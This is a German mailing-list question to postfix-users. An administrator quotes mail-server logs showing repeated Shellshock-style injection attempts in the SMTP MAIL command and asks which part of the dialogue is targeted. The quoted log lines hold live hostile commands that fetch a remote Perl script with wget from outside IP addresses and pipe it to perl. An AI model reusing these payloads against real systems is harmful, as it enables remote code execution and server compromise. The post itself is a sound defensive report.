Frage zu Illegal address syntax Attacke
Joerg Hartmann
joerg at h0815.de
So Jun 4 20:39:49 CEST 2023
Hallo,
in letzter Zeit habe ich häufiger Logeinträge der folgenden Form:
May 28 15:57:04 www postfix/smtpd[7094]: warning: Illegal address syntax
from serv1.jokeroo.com[104.200.159.174] in MAIL command: <() { :; };
wget -qO - 136.243.150.82/das|perl>
May 31 06:40:12 www postfix/smtpd[7307]: warning: Illegal address syntax
from serv1.jokeroo.com[104.200.159.174] in MAIL command: <() { :; };
wget -qO - 68.235.39.225/pax|perl>
Jun 1 14:51:50 www postfix/smtpd[18260]: warning: Illegal address
syntax from serv1.jokeroo.com[104.200.159.174] in MAIL command: <() { :;
}; wget -qO - 68.235.39.225/pax|perl>
Jun 1 21:06:28 www postfix/smtpd[20438]: warning: Illegal address
syntax from serv1.jokeroo.com[104.200.159.174] in MAIL command: <() { :;
}; wget -qO - 68.235.39.225/ipax|perl>
Jun 2 15:43:35 www postfix/smtpd[25713]: warning: Illegal address
syntax from unknown[104.200.146.36] in MAIL command: <() { :; }; wget
-qO - 68.235.39.225/ipax|perl>
Offensichtlich ist dies eine Art "SMTP-Injection" Attacke, bei der eine
lokale Shell gestartet werden soll um per wget eine Datei zu holen, die
zu perl gepiped wird. Das per wget abzuholende File ist ein Perl-Script
von ca. 20KByte Größe mit "unfreundlichem" Inhalt.
Ich kann jedoch nicht erkennen, welche Stelle des "SMTP-Dialogs" hier
angegriffen wird. "Illegal address" deutet (für mich) eher auf die FROM
oder RECIPT TO Kommandos hin. Kann jemand das besser erläutern?
Danke!
Grüße
Jörg
Mehr Informationen über die Mailingliste postfix-users